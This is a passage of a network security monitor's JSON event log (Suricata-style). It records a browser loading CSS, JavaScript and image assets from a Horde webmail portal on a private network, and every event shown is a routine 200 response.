{"timestamp":"2020-02-29T00:24:57.177971+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8192},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47189,"tx_id":1}} 
{"timestamp":"2020-02-29T00:24:57.181252+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196}} {"timestamp":"2020-02-29T00:24:57.182655+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201}} {"timestamp":"2020-02-29T00:24:57.183236+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} 
{"timestamp":"2020-02-29T00:24:57.184142+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:24:57.185061+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140}} {"timestamp":"2020-02-29T00:24:57.188596+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/turba\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":147,"tx_id":0}} 
{"timestamp":"2020-02-29T00:24:57.188909+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569}} {"timestamp":"2020-02-29T00:24:57.190628+0000","flow_id":1124614358556355,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53130,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297}} {"timestamp":"2020-02-29T00:24:57.191480+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":315,"tx_id":0}} 
{"timestamp":"2020-02-29T00:24:57.189049+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":488,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.189253+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":199,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.189640+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306}} {"timestamp":"2020-02-29T00:24:57.189715+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110}} {"timestamp":"2020-02-29T00:24:57.191693+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110},"app_proto":"http","fileinfo":{"filename":"\/js\/popup.js","state":"CLOSED","stored":false,"size":2903,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.193072+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538}} {"timestamp":"2020-02-29T00:24:57.193016+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947}} {"timestamp":"2020-02-29T00:24:57.197940+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569},"app_proto":"http","fileinfo":{"filename":"\/turba\/js\/minisearch.js","state":"CLOSED","stored":false,"size":1408,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.198362+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947},"app_proto":"http","fileinfo":{"filename":"\/js\/tooltips.js","state":"CLOSED","stored":false,"size":2555,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.194052+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/js\/hordeblocks.js","state":"CLOSED","stored":false,"size":528,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.194394+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180}} {"timestamp":"2020-02-29T00:24:57.199683+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538},"app_proto":"http","fileinfo":{"filename":"\/js\/growler.js","state":"CLOSED","stored":false,"size":8911,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.202349+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":222,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.235669+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641}} {"timestamp":"2020-02-29T00:24:57.236618+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/date.js","state":"CLOSED","stored":false,"size":85570,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.237983+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:24:57.238364+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/head-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":3}} {"timestamp":"2020-02-29T00:24:57.238682+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337}} {"timestamp":"2020-02-29T00:24:57.239649+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721}} {"timestamp":"2020-02-29T00:24:57.241182+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974}} {"timestamp":"2020-02-29T00:24:57.241917+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/effects.js","state":"CLOSED","stored":false,"size":38450,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.245147+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117}} {"timestamp":"2020-02-29T00:24:57.244833+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logo.png","state":"CLOSED","stored":false,"size":2337,"tx_id":4}} {"timestamp":"2020-02-29T00:24:57.248170+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423}} {"timestamp":"2020-02-29T00:24:57.248640+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings.png","state":"CLOSED","stored":false,"size":423,"tx_id":5}} {"timestamp":"2020-02-29T00:24:57.254870+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674}} {"timestamp":"2020-02-29T00:24:57.255390+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logout.png","state":"CLOSED","stored":false,"size":674,"tx_id":6}} {"timestamp":"2020-02-29T00:24:57.256235+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116}} {"timestamp":"2020-02-29T00:24:57.256649+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new-bg.png","state":"CLOSED","stored":false,"size":116,"tx_id":7}} {"timestamp":"2020-02-29T00:24:57.256868+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221}} {"timestamp":"2020-02-29T00:24:57.259722+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-normal.png","state":"CLOSED","stored":false,"size":221,"tx_id":3}} {"timestamp":"2020-02-29T00:24:57.260421+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436}} {"timestamp":"2020-02-29T00:24:57.260590+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105}} {"timestamp":"2020-02-29T00:24:57.261079+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new.png","state":"CLOSED","stored":false,"size":436,"tx_id":8}} {"timestamp":"2020-02-29T00:24:57.262825+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 